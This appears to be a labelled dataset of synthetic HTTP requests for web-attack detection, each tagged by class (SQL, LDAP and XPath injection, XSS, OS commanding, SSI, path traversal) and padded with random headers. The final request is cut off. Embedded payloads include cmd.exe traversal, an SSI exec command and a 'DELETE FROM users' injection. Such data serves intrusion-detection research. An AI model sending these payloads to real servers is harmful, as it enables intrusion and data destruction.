GET /szhli8gmv4x/bA2hktju2XCpEH4QZE7/dexeciOWwhereIperl3n/lH7LRshutdownHmrhavingC/7eterLanxahq0mEpr/iyO/lfwY_lwsXoCiJuD.mspx?lfElsott=egnRgagTfiOo&cRIlrtu=+ont&lt2=hg9ea0eo6wsree&dneahrooOrs=epk&sil0oaotn=%3C%21--+++%23exec+cmd%3D%22c%3A%5Cprogra%7E1%5Civ2hex%5Cumynaht%5Cwoitoi.exe++++d%3A%5Cis%5Cwww.aslineattr.org%5Ctns%5Cdatabase.mdb+%2Fx+++++exporttofoxpro%22--%3E&rdh4uHtTetje3e=nMCgnzioyy_&az=%3Aroxv&kzVSkfhPS0=88 HTTP/1.1
Host: www.sjnic.org
Connection: close
Accept: */*;q=0.4
Accept-Charset: *
Accept-Encoding: *;q=0.5
Accept-Language: *;q=0.6
Cache-Control: grtsti='hs'
Client-ip: 8.205.171.214
Cookie: uihp=%;ele0onAsa1alsu=eIuE~window.openod tto3execowanxaccept;AwcsAivoalte=4115574183;pdvaLetooseza=opmntshtpinOae
Cookie2: $Version="651"
Date: Tue, 01 Nov 05 19:39:35 CET
ETag: W/"PvC@pDiEamK-qycb0"
Expect: 100-continue
From: sinl@n3biht.ch
If-Modified-Since: Thu, 15 May 08 17:23:14 UTC
If-Unmodified-Since: Sun, 30 Sep 07 08:43:33 UTC
If-Match: *
If-None-Match: "-TX5SAOWeuikKy.Ctn"
If-Range: "@0tI_RimpK4NvSfA"
Max-Forwards: 58
MIME-Version: 9.5
Pragma: no-cache
Proxy-Authorization: NTLM Y1RuZWlyYmludGxvb2NhRXpldHNJZ25zYWRNaFdlZUJvZDI=
Authorization: NTLM Y3NlZXNuaXhsaG9pbnJUMnJtYXNkZGVoZm95RUVlQXlpZWFsbXloaDVzZWVkcGE=
Range: 1030-
Referer: http://www.2oare.net/tSiloc1/rpe5hmte/b2ohy/Asefxm5.sh
TE: trailers,deflate,trailers
Trailer: Authorization
User-Agent: Mozilla/9.3 (Machintosh; U; PPC Mac OS X 4.6; rp-am; rv:2.2.2) Gecko/25188081
UA-CPU: MIPS
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 6936x3425
Via: 8.3 www.goettee4.shtml, FTP/6.3 www.3et9mro.shtml, 9.5 85.255.95.34
Transfer-Encoding: identity
Upgrade: shUaoo/4.0, eat/0.9, y0aio/2.5, enluo/1.0, siaeN/8.6
Warning: 487 www.1qtdgidu.tiff "h7idno2aalutGrerznAt" "Sun, 05 Mar 06 10:34:02 UTC"
X-Forwarded-For: 234.200.110.255
----: -------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 40273
Start - Id: 49621
class: XPathInjection
GET /eZ7kE3m-2M.d6xI/_w/eBZtWWiiz/sam/sdcTaeangin81aeetunu/aLjydivVzLUNLLy/r1re2egoe/m1t7eYnQJx2.shtml?lrlh=emh%27++or++++wTen%2F6%2Fchild%3A%3Anode%28%29%5Bprocessing-instruction%28%29%3D3%5D+++++or+%27XONPnw%27++++%3D+%27 HTTP/1.0
Host: www.2apmIrtsD.st
Connection: keep-alive
Accept: */*;q=0.8
Accept-Charset: isiri-3342, iso-8859-5
Accept-Encoding: identity, identity;q=0.1, identity, deflate
Accept-Language: *;q=0.0
Cache-Control: only-if-cached
Client-ip: 160.104.242.188
Cookie: ejEH1Khttps=mcetf;SY.JJESw_pYu=bodycopy>d@;dia0lnywssE2ah=oo|;hiyF5iw=nqaw6nP-KBp;5ae=86otee;ee=DerssjdDo2ioAihtr
Cookie2: $Version="4"
Date: Tue, 23 Jun 09 13:44:39 UTC
ETag: W/"AIyB@oMjPz7sVpcv"
Expect: 100-continue
From: ohbn1u@deeHtaer.ch
If-Modified-Since: Wed, 21 Nov 07 07:16:57 CET
If-Unmodified-Since: Sun, 17 May 09 12:26:52 UTC
If-Match: "TqiVgyZM8L1ER40"
If-None-Match: *
If-Range: Tue, 23 Mar 04 05:56:54 GMT
Max-Forwards: 2147
MIME-Version: 6.1
Pragma: Eu0Lp='r'
Proxy-Authorization: NTLM YmVuNjVoOXRhdHJlbmVkanNzYWhuY1Qzc1Nla3NvZW5obmh0
Authorization: Digest qop=auth
Range: 05-349
Referer: http://www.iNu34C7.biz/ego0.php3
TE: trailers,trailers,trailers
Trailer: Accept-Charset
User-Agent: Mozilla/2.7 (Windows; U; WinNT 2.1; da-uN; rv:7.7.7) Gecko/98977010
UA-CPU: StrongARM
UA-Disp: 198,0683,32
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 3223x940
Via: HTTP/5.3 www.rHoscTsi.htm
Transfer-Encoding: gzip
Upgrade: vhimw/6.7, 66r/2.5, 07c/5.1, wa94/8.2
Warning: 750 www.Semo.html:72929 "jrrA0ies6s28ioso" 
X-Forwarded-For: 118.127.121.36
X-Serial-Number: 9696710
----: -----------------------
~~~~~: ~~~~~~~~~~~~~

null

End - Id: 49621
Start - Id: 44496
class: OsCommanding
GET /msadc/..���../..���../..���../winnt/system32/cmd.exe?/c+ HTTP/1.1
Host: www.sswfyiu4.biz
Connection: keep-alive
Accept: application/postscript;q=0.5, video/*;q=0.6
Accept-Charset: windows-1257, windows-1257, x-mac-roman, iso-8859-8-i
Accept-Encoding: *
Accept-Language: *;q=0.5
Cache-Control: only-if-cached
Client-ip: 224.120.218.101
Cookie: rs6U3o0fittstds=887
Cookie2: $Version="20"
Date: Thu, 21 Feb 08 16:19:58 CET
ETag: "brWHOt3l4ea9t1DC"
Expect: 100-continue
From: fo6stv@wTex.net
If-Modified-Since: Tue, 13 Apr 10 19:58:13 GMT
If-Unmodified-Since: Tue, 07 Jul 09 10:23:58 CET
If-Match: *
If-None-Match: "7.q_o8Zr@t3oEVZ.si"
If-Range: *
Max-Forwards: 6087
MIME-Version: 5.5
Pragma: no-cache
Proxy-Authorization: NTLM Z2VpdXJ0b2FubGVFNG95ZWhvZmVwckZkdDF0d2ltcW5kZGRobnRrT2hl
Authorization: NTLM c2hhdTB0b3RpY29rdHBUMmVlVHI1bWhnaW93ZGxvZWVmcnM=
Range: -80,3-,-9028
Referer: http://edqiy1y.net/ehozn.avi
TE: trailers
Trailer: Via
User-Agent: r31Hk1h http://www.9qbxm.gov
UA-CPU: Sparc
UA-Disp: 3780,9274,8
UA-OS: FreeBSD
UA-Color: color8
UA-Pixels: 949x9593
Via: FTP/4.0 2.248.65.229:8462
Transfer-Encoding: gzip
Upgrade: eoke/8.6, mnenb/6.1, 5nls/8.7
Warning: 079 172.67.80.251:54 "7stpts" 
X-Forwarded-For: 106.107.95.22
X-Serial-Number: 80317009323381424111
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44496
Start - Id: 46897
class: XSS
POST /SV2/ugocasohEiedV2glecfT/rAGiw/trleYadfceoai4w3ott.pl? HTTP/1.0
Content-Length: 346
Content-Language: 7
Content-Encoding: gzip
Content-Location: /swsh/nrsrebws.swf
Content-MD5: YXRiM3RpdW5zYnNhaW90aQ==
Content-Type: application/x-www-form-urlencoded
Expires: Fri, 04 Feb 05 02:39:20 UTC
Last-Modified: Sun, 21 Jun 09 17:23:52 GMT
Host: www.eaI6unh3e.uk
Connection: et3s
Accept: */*;q=0.0
Accept-Charset: utf-7, utf-8;q=0.2, iso-8859-8;q=0.9, iso-8859-2;q=0.0, euc-cn
Accept-Encoding: 
Accept-Language: *;q=0.5
Cache-Control: no-cache
Client-ip: 165.85.124.10
Cookie: aelibep=93459;an=nedaed7edftxm/l;QOhttpsIDNY=rNtRx.iDOi
Cookie2: $Version="07"
Date: Sun, 17 Oct 04 14:50:23 CET
ETag: W/"Ja-Xf31larpSBKW5Vf9s"
Expect: nn9rnaex=r6EnRms;Reh7=hco2naP
From: nbfea3@yM2KA0.biz
If-Modified-Since: Thu, 07 Apr 05 08:31:31 GMT
If-Unmodified-Since: Thu, 16 Jun 05 05:46:25 UTC
If-Match: "Rs0MEDjgCXp9YWEU1v"
If-None-Match: "EB1l2_cSfXqNpRA"
If-Range: *
Max-Forwards: 73
MIME-Version: 2.6
Pragma: dvH1='ewTyetna'
Proxy-Authorization: Digest nc=AcC43dEf
Authorization: f77db aetmsn=Lobo5twv
Range: -1
Referer: /ucTyao/irhb/cyladu/oghin/ibeu.php3
TE: trailers,trailers
Trailer: Proxy-Authorization
User-Agent: lJNeY_f0w http://www.ge6ey8r.org
UA-CPU: MIPS
UA-Disp: 457,6373,16
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 8473x700
Via: 3.0 www.msRieUi.htm, FTP/8.5 www.emaoet9e.gif
Transfer-Encoding: identity
Upgrade: c7hl/0.0, ojnjz/4.8, sotds/6.5
Warning: 749 124.119.94.150:741 "rcapb76l7ke" "Tue, 13 Dec 05 01:19:14 GMT"
X-Forwarded-For: 59.28.178.137
X-Serial-Number: 93268691782079750245
----: ----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

ip=<style   type   = "   text/javascript    ">[alert   ('1S2e');]</style  >&slm=7028612&tw=3911&homeMD6liX=163&5rbuwecadoroi0s=el1JfzshX.8&tmriYenjarbefss=1107141283&e3k8-Fexec3Cen=adBcenihs3o&nTirroip=oa &c0hKyRtsoE=a Naionhscopyaoinsert0k&nSteiiOo=Ity&snlelfuspleuni=oyg0_L2tU&gmm4_vmailvBtp=skJ3D&hlleohvalEt=tk

End - Id: 46897
Start - Id: 41532
class: SqlInjection
PUT /aieqm/0zirrt2rBe0liE/sBovwJm1/hhe/BwAQFF58linkJ/oG1YCR/6nfocrrg/e9yNRxEP_XS-BiGxO9/tb.msf? HTTP/1.1
Content-Length: 153
Content-Language: g
Content-Encoding: gzip
Content-Location: http://www.ra7e.de/wp6uv/eo1dn/asjaus.png
Content-MD5: OGhuZzVENE5SYW9ubm9Scg==
Content-Type: application/x-www-form-urlencoded
Last-Modified: Thu, 11 May 06 20:23:40 CET
Host: 9.44.110.34
Connection: close
Accept: */*
Accept-Charset: *
Accept-Encoding: gzip, identity;q=0.6
Accept-Language: aa0gxmr-d
Cache-Control: es=e6e7
Client-ip: 172.28.50.0
Cookie: rcrgE9194i=9807713;rys02iwX=lulri3nrh48
Cookie2: $Version="111"
Date: Sat, 19 Mar 05 24:07:02 GMT
If-Unmodified-Since: Wed, 11 Feb 04 18:25:15 UTC
If-Match: *
Max-Forwards: 9230
Referer: http://www.mBg5.com/aPaaa.wav
TE: trailers,deflate,trailers
User-Agent: Mozilla/0.9 (Machintosh; U; Mac OS X 1.2; sl-23; rv:7.6.6) Gecko/66547309
Via: 1.9 www.opea.tiff
Transfer-Encoding: compress
Upgrade: ied/4.5, ed6tn/2.3, fotom/3.2, ooni/6.1, hhIt/6.5

nx1nddib=1&b62eeVooah=jcokl65&e8dadmstr=ausotnk'   );DELETEFROMusersWHEREupper(username)    =  upper(   'admin&5hsreteehNdoiF=124&hb=ao-N

End - Id: 41532
Start - Id: 36655
class: OsCommanding
GET /anwns2reru8ubjndr/iPlzm1vq28bAlLFT/8kTY2OtCPY9o3vnZc@zk/eUJEfmwTDdsLMUmU/9fa832erdmos5net/enioid/sXYLR7D/UBSMJYobject4N/pQOS36b7_HfPk.jsp?nstylei.=tb7%29&kEnte0=ag&ee6oemwn=96429&oRtGenmy=a03ulmsT%3C4sAshnno&esonrecsoa=%7C++dir++..%5C%5C..%5C%5C..%5C%5C..%5C%5C..%5C%5C..%5C%5C..%5C%5C++%2C HTTP/1.1
Host: www.Myshrt.biz
Connection: dooeR
Accept: text/html;q=0.3
Accept-Charset: *;q=0.1
Accept-Encoding: identity, compress, deflate, gzip, identity;q=0.2
Accept-Language: *
Cache-Control: max-stale
Client-ip: 28.148.253.215
Cookie: tctfnypcjgre=5378091;laeAerfdpiohl=rh
Cookie2: $Version="51"
Date: Sun, 26 Sep 04 02:05:34 UTC
Expect: foAfel
From: zeiTo@a5ng.biz
If-Modified-Since: Tue, 07 Jun 05 04:28:05 CET
If-Unmodified-Since: Mon, 29 May 06 12:21:58 CET
If-Match: *
If-None-Match: "2cdUO98hyQW3@xV"
If-Range: Sun, 01 Mar 09 09:29:57 GMT
Max-Forwards: 702
MIME-Version: 0.9
Proxy-Authorization: NTLM YWRmcmNpZ2gxbjhhQzVucnpjZ2l0YWxzb2R5cm9ybmFmcm4=
Authorization: knwa2 hhrais7=2pEA
Range: -3,-137
Referer: http://benl5.st/teTaEat/eoOlna.pl
TE: deflate;q=0.0
Trailer: If-None-Match
User-Agent: olGioenotGlMcea3ty5
UA-CPU: Sparc
UA-OS: Linux
Via: rost5/2.2 123.53.16.166, FTP/8.9 www.tnsas.tiff
Transfer-Encoding: gzip
Upgrade: ojr3e/2.9, tEafil/9.1, h5s/7.6
X-Forwarded-For: 193.167.35.201
X-Serial-Number: 96597
----: -----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 36655
Start - Id: 37381
class: LdapInjection
GET /elZ.yGbbsL-c/1jdQmOi4O/oa1ffeSnJ35JA/h9o8.g3Sg8wp3HixkX/isehoshba/drgb4DM.dll?na6medsfa=5leeiln6uhehca&l7xitecn=eN&ngdhtaccesf00Nw7HY=6&jVtmpu_rDMM=a%7C%29%3E&evihelt3dB=rueb%24 HTTP/1.1
Host: 217.146.124.15
Connection: close
Accept: video/mpeg, text/*;q=0.6
Accept-Charset: windows-1250;q=0.7, x-mac-chinesesimp, cp-950, iso-8859-7;q=0.3, utf-7
Accept-Encoding: compress;q=0.6, gzip;q=0.6, compress, identity;q=0.3, deflate
Accept-Language: ) (  | (   cn=*o   'brien*  )(mail   =*o    'brien*)
Cache-Control: max-age=04
Client-ip: 98.165.130.171
Cookie: DmNGvMeoDt8@=5vYPa2Ldg_d;mhds=5
Date: Fri, 13 Jul 07 23:30:40 GMT
ETag: W/"C8bvM3CyILQe0CHkK"
Expect: ioma6w
From: rantutaO@slU8aeire.ch
If-Modified-Since: Sat, 27 May 06 16:09:23 UTC
If-Unmodified-Since: Thu, 24 Sep 09 23:07:34 UTC
If-Match: *
If-None-Match: *
If-Range: Sun, 13 May 07 19:31:05 CET
Max-Forwards: 54
MIME-Version: 7.0
Pragma: h='ag55'
Proxy-Authorization: n7te1l piFs=eoleIi1
Authorization: Digest opaque="uiel"
Range: 059445-,841-
Referer: /btppoo/rwDs/aeoie89N.dll
TE: gzip;q=0.1,trailers,trailers
Trailer: Range
User-Agent: pwnNmteoheT
UA-OS: Windows 95
UA-Pixels: 040x3163
Via: 1.8 191.79.172.220:205
Transfer-Encoding: deflate
Upgrade: oth/1.4, eoZf/2.8
X-Serial-Number: 71830
----: ---------------------
~~~~~: ~~~~~~~~~~~~

null

End - Id: 37381
Start - Id: 37918
class: LdapInjection
GET /iC3j/azXRUJbQ4j/LimgJthn.htm?Tylntgm=895330&ceAuoxm6=%29+%28++++%7C+++%28+cn%3D*o++%27brien*+++%29%28mail+++%3D*o%27brien*+++%29++&eip=qJPQb.&csciwiz2aCvro=rzr&u.JC.ZSnT1=u+bbine HTTP/1.0
Host: www.jimypejn.gov
Connection: close
Accept: text/*;q=0.9, text/plain;q=0.5, audio/*
Accept-Charset: iso-8859-5;q=0.4, utf-7
Accept-Encoding: identity
Accept-Language: *;q=0.5
Cache-Control: only-if-cached
Client-ip: 223.210.28.59
Cookie: henEatxs=yM-e.mwS0.;g1y3hhBLUoaadmin=reeo;hyqteuapoog=27;agh0rdfdKnaete=9739
Cookie2: $Version="988"
Date: Wed, 23 Mar 05 21:52:37 CET
ETag: W/"soqXkoKH3wNfz3Lwxq"
Expect: Eoel=5enbA;joo0
From: dshas@enehfts.net
If-Modified-Since: Sun, 02 Mar 08 16:07:36 UTC
If-Unmodified-Since: Sat, 17 Feb 07 22:12:53 GMT
If-Match: *
If-None-Match: "XMahy54BWPoUeyn9H"
If-Range: "xNIn41ga3M_PIV28MzhN"
Max-Forwards: 6303
MIME-Version: 6.1
Pragma: Pns=n0dySecy
Proxy-Authorization: vLiie9 isIdet=nyae4rtc
Authorization: Basic ZXNpdGV1OnB5eXNvc3Ju
Range: 462856-56111,-65
Referer: http://www.ufseHo.com/teiisEys/oiegrg.tar.gz
TE: trailers,trailers
Trailer: Accept-Charset
User-Agent: Eoma/8.6.6
UA-CPU: Sparc
UA-Disp: 472,2226,8
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 649x451
Via: 8.9 176.219.5.101, FTP/4.6 www.eYsnihsa.css:941
Transfer-Encoding: gzip
Upgrade: vmr4ce/8.6, ad1h/2.0, 4cr/6.0
Warning: 778 www.sriAh.html "u4ef" 
X-Forwarded-For: 94.140.32.18
X-Serial-Number: 03021
----: -------------
~~~~~: ~~~~~~~~~~~~~~~~

null

End - Id: 37918
Start - Id: 38449
class: LdapInjection
GET /wijhot/oRTtz99C_SP/odoiPecohdhhbfkuhrtr/11/pnseioOncihteuXaitn/Hej/Gs0JaOqu.dm/iK0epNLxqFgw3Pi/i7GXoh._mof1G.js?5g49qrSDupdatet7=%29++%28+++%7C+++%28++++cn%3D*o+++%27brien*%29%28mail++++%3D*o%27brien*+%29 HTTP/1.1
Host: 147.49.216.116:80
Connection: sNeeme
Accept: application/*;q=0.3, application/rtf;q=0.4
Accept-Charset: cp-936;q=0.9, x-mac-hebrew, windows-874, iso-8859-15, windows-1254;q=0.4
Accept-Encoding: *;q=0.2
Accept-Language: *;q=0.1
Cache-Control: min-fresh=27
Client-ip: 131.162.142.41
Cookie: t3Et=08;e5tssdagnabeqr=e;NeaieRAnzImj= 1Rt;kw=1
Cookie2: $Version="35"
Date: Mon, 28 Jan 08 06:29:14 CET
ETag: "G3Txigpimi-nkqSesa"
Expect: ntiiwopb
From: ehrneaE@tHrzlsadoS.fr
If-Modified-Since: Sat, 21 Mar 09 04:21:28 CET
If-Unmodified-Since: Tue, 23 Sep 08 19:26:45 GMT
If-Match: *
If-None-Match: "T8g1vDP.2RYgB8rzpg"
If-Range: Tue, 26 Jan 10 11:04:23 UTC
Max-Forwards: 8
MIME-Version: 3.3
Pragma: t0aetAe=hcsPsd
Proxy-Authorization: NTLM YXVueWV1dG5kc01uZWVzb3JlaUhrRm5hdGFld2hoc3Ryb250bm44
Authorization: Digest nonce
Range: 86309-
Referer: /8i1blu/nfroz/zern6/elrl.zip
TE: trailers,trailers,deflate
Trailer: If-Range
User-Agent: Mozilla/4.3 (Windows; U; WinNT 8.6; 5e-ai; rv:7.2.5) Gecko/35511884
UA-CPU: 68000
UA-Disp: 945,9874,8
UA-OS: Win9x
UA-Color: color32
UA-Pixels: 632x125
Via: 5.9 67.169.5.10, rxIe/0.5 www.Rsry.jpg, FTP/8.1 www.itA3T.gif
Transfer-Encoding: identity
Upgrade: f6Ter/0.9
Warning: 437 66.2.246.8 "Ubflauttlali" "Tue, 23 Jun 09 09:36:33 GMT"
X-Forwarded-For: 96.44.37.3
X-Serial-Number: 8565701730547644653
----: -----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38449
Start - Id: 44453
class: OsCommanding
GET ..��../winnt/system32/cmd.exe?/c+dir HTTP/1.1
Host: www.ieyre.net
Connection: keep-alive
Accept: */*;q=0.7
Accept-Charset: x-mac-arabic;q=0.2, x-mac-chinesesimp
Accept-Encoding: *;q=0.5
Accept-Language: *;q=0.4
Cache-Control: only-if-cached
Client-ip: 241.65.49.103
Cookie: oos=CcaTenfqbtnn;eat=7aS;4RkY=ekrrKeya4oOu;qc4CNPu=4420;EWZB8EZ.6Yi6=70447518
Cookie2: $Version="77"
Date: Sun, 23 Mar 08 21:01:21 GMT
ETag: W/"CA.F4LqzUCGLA1Nk"
Expect: m8drat
From: j7edhan@ytphgnbey0.biz
If-Modified-Since: Tue, 17 Aug 04 12:13:40 UTC
If-Unmodified-Since: Tue, 18 Mar 08 14:46:23 GMT
If-Match: *
If-None-Match: *
If-Range: Mon, 08 Sep 08 13:48:40 CET
Max-Forwards: 4651
MIME-Version: 1.4
Pragma: i='iS9r'
Proxy-Authorization: Basic TzJicGU6ZXVndHJa
Authorization: Basic ZnRzcmFvOmVzYXhn
Range: 6-02287,72753-
Referer: http://www.tfmsshf4.st/iehoitnv/orgoalwr/eeanei.bin
TE: gzip
Trailer: Expect
User-Agent: Mozilla/2.3 (Machintosh; U; Mac OS X 9.8; co-a4; rv:8.9.7) Gecko/00039717
UA-CPU: Sparc
UA-Disp: 6571,8343,32
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 448x826
Via: 4toy0/2.7 www.wugohG.gif, 9.1 www.eoizmo.png, 7.2 247.79.130.56
Transfer-Encoding: deflate
Upgrade: Sarc/2.6, 8ei9c/3.9, zhD/9.6
Warning: 315 155.65.62.19 "entgnaeqidlakodma" 
X-Forwarded-For: 107.82.88.187
X-Serial-Number: 022178
----: ----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44453
Start - Id: 44704
class: PathTransversal
PUT /weKdh/LqauhmrN/XqOnAobjectVmRMusrqQ./m9aiaoeivobFohshiAz/or/bnF/@fromSRvT0Ydbhtacces9t7.exe? HTTP/1.1
Content-Length: 100
Content-Language: d,se,twhieqsj
Content-Encoding: deflate
Content-Location: http://U6us.de/lt8a/pArrsni/ats4f/94uL.asmx
Content-MD5: c1Jxcm1obnZ0ZWFhaGFubA==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 23 Jan 08 06:56:56 GMT
Last-Modified: Sat, 15 Jan 05 18:45:07 CET
Host: 90.95.45.218
Connection: aeitse
Accept: */*
Accept-Charset: x-mac-roman;q=0.9, x-mac-greek;q=0.7, iso-8859-8-i
Accept-Encoding: *
Accept-Language: *;q=0.6
Cache-Control: no-transform
Client-ip: 159.172.8.1
Cookie: onrtoi=eegebinm;ietaerA7=0;AAsfttbOt2a=trteeueeKgge
Cookie2: $Version="933"
Date: Fri, 27 Mar 09 01:38:55 GMT
ETag: W/"LMhgcAcKZubNHyMAZq"
Expect: eopynrn=ccgFnA
From: aiino4r@HoCiOqeo.be
If-Modified-Since: Fri, 20 Jun 08 24:26:02 CET
If-Unmodified-Since: Fri, 09 Jan 04 03:21:00 CET
If-Match: *
If-None-Match: *
If-Range: Tue, 20 Jan 04 09:57:24 UTC
Max-Forwards: 54
MIME-Version: 8.4
Pragma: no-cache
Proxy-Authorization: Basic dzZubjptdHlo
Authorization: Basic c2F2bHI6ZWFsbQ==
Range: 8542-,-709
Referer: /rfgTyaet.tiff
TE: trailers,trailers,gzip
Trailer: If-Unmodified-Since
User-Agent: gshirasofnTndtCreg
UA-CPU: StrongARM
UA-Disp: 7865,313,32
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 0076x674
Via: 9.7 172.187.62.211, FTP/0.3 www.ipseh.tiff, 4.3 18.32.169.156:37439
Transfer-Encoding: compress
Upgrade: ncsal/3.2, soi1/9.9, 2ilb/8.2
Warning: 857 185.30.26.113 "mesibeEtevaqn" "Sun, 20 Apr 08 19:11:08 GMT"
X-Forwarded-For: 121.97.240.234
X-Serial-Number: 145776
----: -----------------------
~~~~~: ~~~~~~~~~~~~~~~~~

nm2=584&adh=file:///z:/as5/i63ag/Tf0vjbl.xml&udi=tytSPp&Ynunion5gMKpXawinntG=5781267

End - Id: 44704
Start - Id: 49417
class: XPathInjection
GET /4hIaeweiksdgra8ai/h9/hImZAJFr/dffareggA/U0a@QwH.skmetafM/3M0/f9YmG.nQp/9ajetgWoane/ceelr/YH@XPAnodei.jpg?J_VA4blq=pciwn4l%27++++or++m%2Fsmt%2Fchild%3A%3Anode%28%29%5Bprocessing-instruction%28%29%3D0%5D+++++or+++%279qlnrmD%27%3D+%27&.i2O-x27positionRm=44649&deh=eni6epphp%40er7ysmrt&5nth=daLdNennlri&sde15tpclalaeud=t%3A+&7hscwwoes8ltoe0=c2oZSQH44&.JlsueEC=56267&psvioosotn3ntv=joHrtlwtob8%29&qotejNe6=d+sl&1ehvhnyo=3493&YnsEshutdownek=7025934&i3Wnvefi=et HTTP/1.1
Host: 211.175.253.168
Connection: keep-alive
Accept: audio/*;q=0.5, audio/*;q=0.8, application/zip;q=0.4
Accept-Charset: *
Accept-Encoding: *
Accept-Language: i-0sdi, i-E088;q=0.4, temHa-2metae, otse-isNwavyo
Cache-Control: nhNSten='st5hce'
Client-ip: 93.18.190.156
Cookie: in692knqgY-S=nAt4jh3l;7elr4Afyjedabt=\h:Hnna|)56@stits]iu;tceao=$ewoeeehe whereEcmaildC;tqoh4srbl=am
Cookie2: $Version="37"
Date: Sat, 01 Apr 06 10:02:36 GMT
ETag: W/"ONu.h9pwPr9uAEf6q"
Expect: denean=anNwroTo
From: 2etopwi@exrhsnpxt.org
If-Modified-Since: Sat, 25 Jul 09 09:05:12 UTC
If-Unmodified-Since: Wed, 30 Apr 08 11:41:36 GMT
If-Match: "_9QTrUaBVPXaYoFY1"
If-None-Match: "_Nd3dywAkmrpNqFE74"
If-Range: Sun, 11 Feb 07 15:57:34 CET
Max-Forwards: 979
MIME-Version: 0.6
Pragma: no-cache
Proxy-Authorization: Digest username="DtanLIte"
Authorization: Digest nc=A74a4Ae1
Range: 77585-376599
Referer: http://trd7l3y.uk/ogrn.jsp
TE: gzip,trailers
Trailer: Cache-Control
User-Agent: Mozilla/5.3 (Machintosh; U; PPC 5.7; en-ga; rv:0.6.9) Gecko/97492884
UA-CPU: StrongARM
UA-Disp: 422,204,32
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 334x4748
Via: roOe/0.5 www.yjarcai.png:6
Transfer-Encoding: gzip
Upgrade: dec/5.5, 4kklt/1.7
Warning: 168 www.mBsttTo.jpg "zsvb" "Fri, 02 Nov 07 10:06:41 UTC"
X-Forwarded-For: 222.117.148.160
X-Serial-Number: 812184590933752195
----: -------------
~~~~~: ~~~~~~~~~~~~~~~~~

null

End - Id: 49417
Start - Id: 39487
class: SSI
PUT /e6Iyma-NhYNXD6/uhwfyasnmen/tUsd/lOPQNEhr@/txEkrjDP@Ui/Y-zylQexec/eg6te/e9enmd.png? HTTP/1.1
Content-Length: 269
Content-Language: rer3R,kds,u
Content-Encoding: compress
Content-Location: /06ai/rsnGsn/esEUik/wthtDmN.msf
Content-MD5: MEttZDFpeXR0OGR0RTFpdQ==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 07 Jan 04 10:25:21 UTC
Last-Modified: Sat, 22 Sep 07 07:39:27 CET
Host: 120.203.48.218:80
Connection: keep-alive
Accept: video/*;q=0.4, video/mpeg;q=0.1
Accept-Charset: x-mac-chinesetrad;q=0.9, windows-1254
Accept-Encoding: *
Accept-Language: *
Cache-Control: no-store
Client-ip: 229.81.195.128
Cookie: nahtnsgd=<!-- #exec    cgi="/cgi-bin/script?li"     -->;ei44ienjrre=HisSnSck;uhaa9nusmzd=re;0eTtwa=homee 9;nhamA=enm1ahrna
Date: Thu, 15 Jun 06 16:48:00 CET
ETag: "al@by7xP@iPI8Sbb2bU"
Expect: eee0pnR=7ytleLgA
If-Modified-Since: Sat, 24 Apr 04 10:30:28 CET
If-Unmodified-Since: Tue, 15 Aug 06 07:33:02 CET
If-Match: *
If-None-Match: *
If-Range: "9CXK28zGCovEq.FuYl"
Max-Forwards: 674
MIME-Version: 2.0
Pragma: no-cache
Proxy-Authorization: Basic dGVpbW9oN2E6ZFBhbQ==
Authorization: NTLM cklrYWx0Mk53b2xudEhlQWZldW52dGNudHNpYWRhdHRpaG51
Range: -2,63669-
Referer: /ehxni9/traxahD.asmx
TE: deflate;q=0.5
Trailer: Range
User-Agent: Mozilla/2.8 (X11; U; SunOS sun4u 2.7; ci-li; rv:0.6.5) Gecko/88435384
UA-Color: color16
Via: 7.8 www.1tgtad.jpeg
Transfer-Encoding: identity
Upgrade: aalw7o/6.7, iptoA/1.5, emats/7.7
----: ------------------------------------------------

thosudi=859753&lsiao1Ep=sj543nenDIyhn4&ySt=Ptovq'0dwget&aiwDs=32067386&gWheeDiessrNy=nocbtctvwzys&wY6TIy=27765199&oadd=mntxvoA2o7smersk&xQjHT=i&-logALXm7t0= ihdocumente&XDQSwi7k5=itdieo7ruaiJt&3pdeinDhTpyG=GtvCuniontepehdepni&snntfqnlttmo=kqttoreotai&s4ojte=eihhissoe

End - Id: 39487
Start - Id: 47726
class: XSS
GET /gEdohafOa/kW/lityocSsmEtg/uTPW.@YZZWfFvsc1PGF/1J/nQ.msf?ohios2piTixMw=42541634&fB91AJW-_=48218776&xat=oc9tboot.ini%3BtU%27fs&Tnrpq7b=8594&zmmnieourUdTuio=93&reoamlpeA=%3Clink+++++rel+++%3D+%22stylesheet+++%22+href++%3D+++%22+++++javascript%3A+++%5Balert+++%28%27lit%27%29%3B%5D+++++%22%3E&RxJQk@=etloywpree8e&jardm=210454318&hn=34j&arus=1iio77o&e4mdt=%7C%5CEAne&ttryotcomklt=sipaiknstrbEse07c&ttno0sselsatl=6TIpjb&h1t=64&TnlikeHUo-Jneelike=o5pewfp HTTP/1.0
Host: www.svieodaH.org:23
Connection: keep-alive
Accept: */*;q=0.6
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *;q=0.6
Cache-Control: no-cache
Client-ip: 90.114.63.204
Cookie: paAdNAonlssnwe=06965;Manr=&eryfe/;services@gXLoI=9
Cookie2: $Version="622"
Date: Mon, 21 Aug 06 12:41:48 GMT
ETag: "3NoB8gEdJ4qpGAoUK"
Expect: 100-continue
From: aonie0x@uTdtewu.be
If-Modified-Since: Mon, 22 Mar 04 09:50:18 GMT
If-Unmodified-Since: Wed, 22 Feb 06 24:05:12 CET
If-Match: "bQ1qSlQyifULxETmgjKS"
